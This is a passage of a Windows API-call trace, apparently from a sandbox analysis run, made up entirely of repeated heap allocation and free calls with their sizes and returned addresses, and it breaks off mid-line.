[0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76388 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760b8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc764a8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76538 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc765c8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc759f8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ba8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a88 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75e78 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f08 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75f98 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76028 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc77ca8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78758 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc787e8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78878 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78098 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc781b8 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76418 | out: hHeap=0xc50000) returned 1 [0030.792] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79020 | out: hHeap=0xc50000) returned 1 [0030.792] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc56ed0 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc79598 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73ba0 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc78cd8 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75de8 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79138 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75de8 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc75318 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b28 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75318 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc75698 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73b28 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc78bc0 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75698 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.793] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.793] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.794] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.794] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.795] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.795] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78cd8 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79138 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79598 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc78bc0 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73ba0 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc56ed0 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc757b8 | out: hHeap=0xc50000) returned 1 [0030.796] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc798e0 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71d08 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75698 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71d08 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc75968 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x108) returned 0xc78aa8 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x4) returned 0xc66f88 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79020 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79368 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc72148 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x10c) returned 0xc78cd8 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73b70 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x84) returned 0xc76268 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc72148 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79480 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76268 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc753c8 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0xc) returned 0xc73c60 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc753c8 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x88) returned 0xc758d8 [0030.797] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73c60 | out: hHeap=0xc50000) returned 1 [0030.797] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc79138 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc758d8 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.798] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.798] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: hHeap=0xc50000) returned 1 [0030.799] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x8) returned 0xc66f88 [0030.799] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66f88 | out: 